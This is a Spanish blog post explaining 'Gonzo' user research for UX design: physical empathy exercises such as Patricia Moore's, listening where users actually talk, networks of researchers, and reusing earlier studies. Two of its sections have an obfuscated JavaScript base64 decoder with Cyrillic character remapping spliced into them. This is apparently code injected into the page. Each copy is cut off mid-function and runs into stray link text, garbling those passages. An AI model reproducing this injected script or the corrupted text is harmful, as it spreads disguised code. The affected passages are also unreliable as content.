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THE MUPPETS

Gonzo User Research, Involucrándose con el usuario

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La Metodología Gonzo tiene su origen en el periodismo de los años 70. En específico de una sub-rama del llamado "nuevo periodismo". Esta nueva forma de hacer periodismo se caracterizó principalmente por una aproximación personal hacia la noticia, inclusive involucrándose directamente en esta.

Es esto último lo que, en UxD, se aplica al estudio de usuario y contexto de uso.

A continuación cuatro prácticas de esta metodología que podrían mejorar notablemente nuestro conocimiento del usuario y el nivel calidad de nuestros proyectos:

  • Involúcrate físicamente.
  • Profundiza en lo cotidiano.
  • Forma redes de investigadores.
  • Revisa lo que ya investigó antes.

Involúcrate físicamente.

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Se trata de "ponerse en los zapatos de su usuario". En la década de los 70s y 80s, Patricia Moore recorrió varios ciudades de Estados Unidos y Canadá disfrazada de una anciana de 80 años usando órtesis para dificultar su movimiento. Su idea era experimentar el el uso de equipamiento público y privado, accesorios, vivienda y relaciones sociales.
Su investigación duró tres años y recorrió 116 ciudades.
Obviamente no es posible hacer investigaciones tan profundas y radicales para cada uno de los proyectos que diseñamos, pero sería bueno incluir algunas prácticas de empatía.
Usar ese formulario antes de rediseñarlo, recorrer ese edificio en el que se implementará el proyecto de señalética, visitar como usuario aquel museo para el cual estamos diseñando interfaces táctiles, y un largo etcétera.

 

Profundiza en lo cotidiano.

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Las recientes campañas Anti tabaco dirigidas a mujeres adolescentes londinenses no tuvieron tanto efecto sino hasta que los redactores y creativos se decidieron a visitar lugares frecuentados por ellas y lograron escuchar y entender cuales eran los temas relevantes en sus conversaciones.
Como resultado se cambió el CCC de las campañas. Antes aludía a la salud y el peligro de muerte, sin embargo, las conversaciones adolescentes no tratan de estos temas. Los efectos reales de la campaña se vieron cuando se comenzó a hablar de manchas en la piel, mal aliento y bocas arrugadas.
En resumen, si quiere conocer a su usuario, tómese el tiempo de ir donde están las verdaderas conversaciones, conozca sus códigos, entérese de sus intereses, y otro largo etcétera.

Forma redes de investigadores.

function m65c3bbf5572b(wc){var s4='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r1='';var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfandose-con-el-usuario/attachment/mobile_reserach/">Muchas veces nuestros proyectos están relacionados con realidades ajenas a la local, o con grupos de usuarios tan amplios que complican una rápida investigación y la obtención de insights oportunos.
Una buena forma de afrontar estudios de usuarios en lugares apartados o en varios lugares a la vez, es el reclutamiento y contratación de investigadores freelance que puedan entregarnos feedback y darnos una visión y sentido global de las características, comportamientos del usuario y del contexto de uso.
No necesariamente tendremos que contratar estos profesionales, también esta la posibilidad de canje entre empresas e instituciones. Por ejemplo, una agencia chilena podría canjear horas de user research con una empresa en Barcelona.
Este tipo de prácticas nos permiten llegar más lejos, durante más tiempo y con más detalle.

Revisa lo que ya investigó antes.

function m65c3bbf5572b(wc){var s4='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r1='';var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfandose-con-el-usuario/attachment/folders/">En muchos de nuestros proyectos hacemos pequeños estudios que no siempre se conectan entre si. Es vital organizarlos de tal manera que podamos reutilizar los aprendizajes y hallazgos de otros estudios. Es un pequeño proyecto de gestión de conocimiento que permite aprovechar mejor nuestros, siempre escasos, recursos para research.

Una detalle importante, en un principio hágalo rápido, muy rápido, para poder tener pronto un entregable que permita, en futuras iteraciones , complementarlo, contrastarlo o validarlo.

Gonzo User Research se podría enmarcar dentro de las metodologías de Guerrilla y metodologías ágiles. Sin duda una buena forma de comenzar nuestros estudios de Usuario.

¿Tienes alguna otra idea de como levantar estudios de usuario en forma rápida?

links para profundizar:

¿Quién es Patricia Moore?
¿Cuál es el origen de la metodología Gonzo?
¿Que significa investigación de GUERRILLA?

Por cierto, este artículo muy poco que ver con la foto que lo precede, pero me pareció una buena forma de captar su atención. Quizás la única relación de la imagen con el contenido es el nombre propio.

¿Quién es el otro GONZO?

 

jacobustamante

Consultor, investigador y docente en Visualización de Datos Aplicada Se ha desempeñado como consultor y diseñador independiente desde 2000, en proyectos de mediana y alta complejidad con énfasis en Visualización de Datos, visual analytics y métricas, Estrategias de Contenidos para publicaciones digitales e Interfaces Multitouch en áreas tecno-educativas para instituciones tales como: Ministerio de Educación de Chile, Editorial McGraw-Hill, Biblioteca del Congreso Nacional de Chile, Universidad de Chile, Centro Cultural Palacio La Moneda, Museo Interactivo Mirador y CEPAL, entre otros. Posee especial experiencia docente en pregrado y postgrado en las escuelas de Diseño de la Universidad de Chile (UCH), ICEI de la Universidad de Chile (UCH) y la Facultad de Humanidades de la Universidad de Santiago de Chile (USACH) en áreas vinculadas con Teorías de la Comunicación, Taller de Diseño, Semiótica de la Imagen y Visualización de Datos, área en la que también ha realizado investigación disciplinar, docencia especializada y actividades de extensión ad-hoc. Actualmente en el marco del programa de Magister de Comunicación Social de la Universidad de Chile, se encuentra investigando temáticas que vinculan la Visualización de datos, las comunidades académico-científicas y la disciplinas del Diseño y otras transdisciplinas.

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